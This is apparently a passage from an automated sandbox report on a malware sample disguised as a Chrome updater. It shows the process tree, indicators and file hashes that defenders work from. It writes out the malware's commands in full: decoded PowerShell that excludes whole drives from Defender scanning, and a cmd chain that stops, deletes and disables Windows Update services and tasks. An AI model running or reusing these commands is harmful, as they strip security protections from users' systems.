    decoded (UTF-16LE base64): <#qb#> Start-Process -FilePath 'C:\Program Files\Google\Chrome\updater.exe' -Verb RunAs <#ms#>
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
  [2] C:\Program Files\Google\Chrome\updater.exe
      command line: "C:\Program Files\Google\Chrome\updater.exe"
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
    [3] C:\Windows\System32\conhost.exe
        command line: "C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"
        - Drops file in Drivers directory
        - Drops file in System32 directory
        - Suspicious use of SetThreadContext
        - Drops file in Program Files directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"
          decoded (UTF-16LE base64): <#pa#> Add-MpPreference <#adjz#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#ws#> -Force <#ry#>
          - Drops file in System32 directory
          - Modifies data under HKEY_USERS
          - Suspicious behavior: EnumeratesProcesses
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\sc.exe (depth 5)
sc stop UsoSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (depth 5)
sc stop WaaSMedicSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (depth 5)
sc stop wuauserv
- Launches sc.exe
-
C:\Windows\system32\sc.exe (depth 5)
sc stop bits
- Launches sc.exe
-
C:\Windows\system32\sc.exe (depth 5)
sc stop dosvc
- Launches sc.exe
-
C:\Windows\system32\reg.exe (depth 5)
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 5)
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 5)
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 5)
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 5)
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
- Modifies registry key
-
C:\Windows\system32\takeown.exe (depth 5)
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe (depth 5)
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\schtasks.exe (depth 5)
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 5)
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 5)
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 5)
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 5)
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 5)
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
-
C:\Windows\system32\schtasks.exe (depth 5)
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
-
C:\Windows\system32\reg.exe (depth 5)
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 5)
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 5)
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (depth 5)
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\System32\cmd.exe (depth 4)
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
-
C:\Windows\system32\powercfg.exe (depth 5)
powercfg /x -hibernate-timeout-ac 0
-
C:\Windows\system32\powercfg.exe (depth 5)
powercfg /x -hibernate-timeout-dc 0
-
C:\Windows\system32\powercfg.exe (depth 5)
powercfg /x -standby-timeout-ac 0
-
C:\Windows\system32\powercfg.exe (depth 5)
powercfg /x -standby-timeout-dc 0
-
C:\Windows\System32\conhost.exe (depth 4)
C:\Windows\System32\conhost.exe "bmkeytcye"
-
C:\Windows\explorer.exe (depth 4)
C:\Windows\explorer.exe sosudejrcxm1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8dyBC4RhMJQS3ZIS6W4m7i7iEJ7cohkojQOsRFzNMr56
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Program Files\Google\Chrome\updater.exe
Filesize 7.1MB
MD5 2144e985a1fb8a18636dee1b1fcf096f
SHA1 fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA256 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA512 48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize 3KB
MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 d40967c47cf326de693576ebae1d8522
SHA1 7d1b6f9e84fb5d3d933496acc7e568f0e321920f
SHA256 ef5b2454edae5f5327531699e2815257ae55aa7f008c3067bd4127865bb932f9
SHA512 b28c4fab919d81bc6966796a423499aeb0526a38f88c9437958b1b8de930be542aaee1e654716d5ed8803416bc2f252d094a374db1952f2285de2f112f6219d7
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize 3KB
MD5 5d574dc518025fad52b7886c1bff0e13
SHA1 68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7
SHA256 755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2
SHA512 21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 e2d46bffd1d9300639cac360fac02cb4
SHA1 fd2b4813c8ab610294b6759192ca05bad5bb8958
SHA256 94ffe575e92d3bab6173fd7eca207088c8b374de79d93dddf45101048c0bead3
SHA512 54b1ea5f5bb1d8a402fbb5ab8f0d7bec9aa47cb48a4c411ee8032648a97efe466d9d8e7f87c5ac288e994eeb47e034eac94bb3631955f9ba2270d687e7620535
-
C:\Windows\system32\drivers\etc\hosts
Filesize 2KB
MD5 c5227366b7a688ff23b01788718251aa
SHA1 9795262e79c832ba49c744fcd1b1794c0ffb5c6a
SHA256 789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48
SHA512 8b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe
-